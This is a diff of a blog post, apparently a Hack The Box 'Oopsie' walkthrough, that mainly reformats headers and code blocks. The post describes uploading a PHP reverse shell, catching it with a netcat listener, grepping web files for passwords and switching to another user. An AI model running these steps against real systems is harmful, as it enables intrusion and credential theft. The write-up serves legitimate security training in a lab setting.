--- a/_posts/ctf/htb/starting-point/2022-03-06-Oopsie.md
+++ b/_posts/ctf/htb/starting-point/2022-03-06-Oopsie.md
@@ -1,11 +1,10 @@
 ---
 layout: post
 title: 'HTB | Oopsie'
-date: 2022-03-06
 permalink: /htb/starting-point/oopsie/
 ---
 
-# [](header-4)Enumeration
+# Enumeration
 
 The nmap will show us:
 {% highlight plain %}
@@ -31,7 +30,7 @@ Now we can set Firefox to listen to **Burp Suite**:
 In the Burp Suite app we can see there is a login:
 <img src="https://raw.githubusercontent.com/zeropio/zeropio.github.io/main/_posts/htb/starting-point/img/Screenshot_5.jpg" weight="100%" />
 
-# [](#header-4)Foothold
+# Foothold
 
 Now we have access to the login page:
 <img src="https://raw.githubusercontent.com/zeropio/zeropio.github.io/main/_posts/htb/starting-point/img/Screenshot_6.jpg" weight="100%" />
@@ -49,38 +48,38 @@ Now we can use those credentials to change the cookies:
 <img src="https://raw.githubusercontent.com/zeropio/zeropio.github.io/main/_posts/htb/starting-point/img/Screenshot_10.jpg" weight="100%" />
 
 We will upload a reverse shell in php and use gobuster to find where it is uploaded:
-{% highlight plain %}
-$ gobuster dir -u http://10.129.95.191/ -w /usr/share/wordlists/directory-list-2.3-small.txt -x php 
+{% highlight bash %}
+> gobuster dir -u http://10.129.95.191/ -w /usr/share/wordlists/directory-list-2.3-small.txt -x php 
 
 /uploads              (Status: 301) [Size: 316] [--> http://10.129.95.191/uploads/]
 {% endhighlight %}
 
 We will open a netcat and execute the reverse shell through the browser:
-{% highlight plain %}
-$ sudo nc -lvvp 1234
+{% highlight bash %}
+> sudo nc -lvvp 1234
 {% endhighlight %}
 
 Now we have access to the system and to the user flag:
-{% highlight plain %}
-$ cat /home/robert/user.txt
+{% highlight bash %}
+> cat /home/robert/user.txt
 {% endhighlight %}
 
 We can import a python module to get a better shell:
-{% highlight plain %}
-$ python3 -c 'import pty;pty.spawn("/bin/bash")'
+{% highlight bash %}
+> python3 -c 'import pty;pty.spawn("/bin/bash")'
 {% endhighlight %}
 
 
-# [](#header-4)Privilege Escalation
+# Privilege Escalation
 
 Inside we can search in the Apache server and find the password:
-{% highlight plain %}
+{% highlight bash %}
 www-data@oopsie:/var/www/html/cdn-cgi/login$ cat * | grep pass
         if($_POST["username"]==="admin" && $_POST["password"]==="MEGACORP_4dm1n!!")
 {% endhighlight %}
 
 In the **db.php** file we can get another passwords:
-{% highlight plain %}
+{% highlight bash %}
 www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
         <?php
         $conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
@@ -88,24 +87,19 @@ www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
 {% endhighlight %}
 
 We can now use that password to access robert user:
-{% highlight plain %}
+{% highlight bash %}
 www-data@oopsie:/var/www/html/cdn-cgi/login$ su robert
 Password: M3g4C0rpUs3r!
 {% endhighlight %}
 
 With the **id** command we can see that Robert is in the same group as bugtracker.
-{% highlight plain %}
+{% highlight bash %}
 robert@oopsie:/$ id
 uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
 {% endhighlight %}
 
 We can now search for the bugtracker group:
-{% highlight plain %}
+{% highlight bash %}
 robert@oopsie:/$ find / -group bugtracker
 /usr/bin/bugtracker
-{% endhighlight %}
-
-
-{% highlight plain %}
-
 {% endhighlight %}
